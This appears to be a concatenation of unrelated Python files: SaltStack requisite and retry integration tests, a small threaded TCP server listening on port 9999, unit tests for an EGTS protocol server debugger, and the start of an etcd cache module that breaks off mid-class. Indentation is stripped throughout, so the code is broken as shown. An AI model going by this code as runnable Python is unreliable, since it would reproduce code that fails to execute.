expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
file_name = os.path.join(TMP, 'nonbase_env')
state_run = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
state_id = 'file_|-test_file_|-{0}_|-managed'.format(file_name)
self.assertEqual(state_run[state_id]['comment'],
'File {0} updated'.format(file_name))
self.assertTrue(
state_run['file_|-test_file_|-{0}_|-managed'.format(file_name)]['result'])
self.assertTrue(os.path.isfile(file_name))
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}/test.txt'.format(TMP),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}/test.txt'.format(TMP),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}/test.txt created'.format(TMP)}},
'file_|-unless_true_onlyif_false_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}/test.txt'.format(TMP),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}/test.txt'.format(TMP),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
|
tcpServer.py
|
#!/usr/bin/python
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip,bind_port))
#this is out client-handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print("[*] Received: %s" % request)
#send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print("[*] Accepted connection from: %s:%d" % (addr[0],addr[1]))
#spin up out client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
test_passive_server_debugger.py
|
import socket
import threading
import time
import unittest
import sys
from io import StringIO
from egtsdebugger.passive_server_debugger import PassiveEgtsServerDebugger
from egtsdebugger.egts import *
auth_packet = b"\x01\x00\x00\x0b\x00\x0f\x00\x01\x00\x01\x06\x08\x00\x01\x00\x38\x01\x01\x05\x05\x00\x00\xef" \
b"\x03\x00\x00\x07\xcd"
incorrect_reply = bytes([1, 0, 3, 11, 0, 16, 0, 9, 0, 0, 167, 9, 0, 0, 6, 0, 9, 0, 24, 2, 2, 0, 3, 0, 9, 0, 0, 0, 196])
reply_packet = bytes([1, 0, 3, 11, 0, 16, 0, 9, 0, 0, 167, 9, 0, 0, 6, 0, 9, 0, 24, 2, 2, 0, 3, 0, 9, 0, 0, 0, 195])
class TestPassiveServerDebugger(unittest.TestCase):
"""Tests for EgtsPassiveServerDebugger class"""
def setUp(self):
self.port = 9093
self.host = 'localhost'
self.dispatcher = 1007
self.filename = 'data/2000_records.csv'
def test_connection_error(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_server_connection_error()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
self.assertEqual("ERROR. server has closed the connection. No packets were received.\n", output)
def test_incorrect_auth_message(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_server_incorrect_auth_message()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
self.assertEqual("ERROR. EGTS connection test failed: error parsing EGTS packet. Error code 128. Unsupported "
"protocol version (PRV not found).\n",
output)
def test_incorrect_dispatcher_type(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_server_incorrect_dispatcher_type()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """Dispatcher Type must be equal to 0. Currently it is equal to 1
Error validating first packet: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 1, did: 1007}]}]
ERROR. First packet is incorrect.
"""
self.assertEqual(msg, output)
def test_incorrect_dispatcher_id_message(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_server_incorrect_dispatcher_id_message()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """Expected Dispatcher ID = 1007 but got 2116
Error validating first packet: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, ID: 12, subrecords: [{Type: 5, dt: 0, did: 2116},{Type: 8},{Type: 8},{Type: 8},{Type: 8},{Type: 8}]}]
ERROR. First packet is incorrect.
"""
self.assertEqual(msg, output)
def test_success_1(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/1_record.csv"})
self.start_test_server_success(1)
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 1 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_success_5(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/5_records.csv"})
self.start_test_server_success(1)
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 5 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_success_2000(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_server_success(20)
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 20 packets including 2000 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_incorrect_egts_reply(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread()
self.start_test_incorrect_egts_reply()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
ERROR. EGTS connection test failed: error parsing EGTS packet. Error code 138. Data check sum error (Calculated crc: 49920, crc in packet: 50176).
"""
self.assertEqual(msg, output)
def test_unexpected_reply_success(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/5_records.csv"})
self.start_test_unexpected_reply_success()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
Warning: received unexpected replies: [9]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 5 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_unexpected_reply_failed(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/5_records.csv"})
self.start_test_unexpected_reply_failed()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
Warning: received unexpected replies: [9]
Error: did't receive reply on packets [1, 2, 3, 4, 5]
"""
self.assertEqual(msg, output)
def test_did_not_received_replies(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/5_records.csv"})
self.start_test_did_not_received_replies()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
ERROR. Sent 1 packets including 5 records, but received no replies from EGTS server.
"""
self.assertEqual(msg, output)
def test_socket_error(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
sever_thread = self.start_debugger_thread(**{'filename': "data/2000_records.csv"})
self.start_test_socket_error()
sever_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = "First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{" \
"Type: 5, dt: 0, did: 1007}]}]\nERROR. Got socket error:"
self.assertEqual(output.startswith(msg), True)
def start_debugger_thread(self, **kwargs):
if 'filename' in kwargs:
filename = kwargs['filename']
else:
filename = self.filename
egts_conn_test = PassiveEgtsServerDebugger(self.host, self.port, filename, self.dispatcher)
debug_thread = threading.Thread(target=egts_conn_test.start)
debug_thread.start()
time.sleep(0.00001)
return debug_thread
def start_test_server_connection_error(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.close()
def start_test_server_incorrect_auth_message(self):
sock = socket.socket()
sock.connect((self.host, self.port))
msg = bytes(555)
sock.send(msg)
sock.close()
def start_test_server_incorrect_dispatcher_type(self):
sock = socket.socket()
sock.connect((self.host, self.port))
auth_packet = b"\x01\x00\x00\x0b\x00\x0f\x00\x01\x00\x01\x06\x08\x00\x01\x00\x38\x01\x01\x05\x05\x00\x01\xef" \
b"\x03\x00\x00\x56\x67"
sock.send(auth_packet)
sock.close()
def start_test_server_incorrect_dispatcher_id_message(self):
sock = socket.socket()
sock.connect((self.host, self.port))
auth_packet = b"\x01\x00\x00\x0B\x00\x35\x00\x01\x00\x01\x2B\x26\x00\x01\x00\x85\x0C\x00\x00\x00\xC9\xD7\x22" \
b"\x12\x01\x01\x05\x05\x00\x00\x44\x08\x00\x00\x08\x03\x00\x01\x00\x00\x08\x03\x00\x02\x00\x00" \
b"\x08\x03\x00\x04\x80\x00\x08\x03\x00\x09\x80\x00\x08\x03\x00\x0A\x80\x00\xAE\xD8"
sock.send(auth_packet)
sock.close()
def start_test_server_success(self, num_of_packets):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
buff = b""
pid = 0
rid = 0
with sock:
while pid < num_of_packets:
data = sock.recv(1024)
buff = buff + data
try:
while len(buff) > 0:
egts = Egts(buff)
buff = egts.rest_buff
reply = egts.reply(pid, rid)
pid += 1
rid += 1
sock.send(reply)
except EgtsParsingError:
continue
def start_test_incorrect_egts_reply(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.send(incorrect_reply)
sock.close()
def start_test_unexpected_reply_success(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
data = sock.recv(1024)
egts = Egts(data)
reply = egts.reply(1, 1)
sock.send(reply_packet)
sock.send(reply)
sock.close()
def start_test_unexpected_reply_failed(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.send(reply_packet)
sock.close()
def start_test_did_not_received_replies(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.close()
def start_test_socket_error(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.close()
def _parse_egts(self, data):
try:
self.egts = Egts(data)
except Exception as err:
self.fail("Error while parsing EGTS:" + str(err))
if __name__ == '__main__':
unittest.main()
|
etcd_cache.py
|
"""
Local Cache for ETCd values
"""
import etcd
from threading import Event, Thread
from time import sleep
from typing import Callable, List, Tuple, Union
from .general import isFunction
from .ext_dicts import FrozenDict, QueryDict
# Type Hinting
Callback = Callable[[FrozenDict], None]
Callbacks = Union[
List[Callback],
Tuple[Callback, ...]
]
class ReusableThread(Thread):
"""
Base: https://www.codeproject.com/Tips/1271787/Python-Reusable-Thread-Class
This class provides code for a restartale / reusable thread
join() will only wait for one (target)functioncall to finish
finish() will finish the whole thread (after that, it's not restartable anymore)
"""
def __init__(self, target: Callable, args: tuple = None, kwargs: dict = None):
self._startSignal = Event()
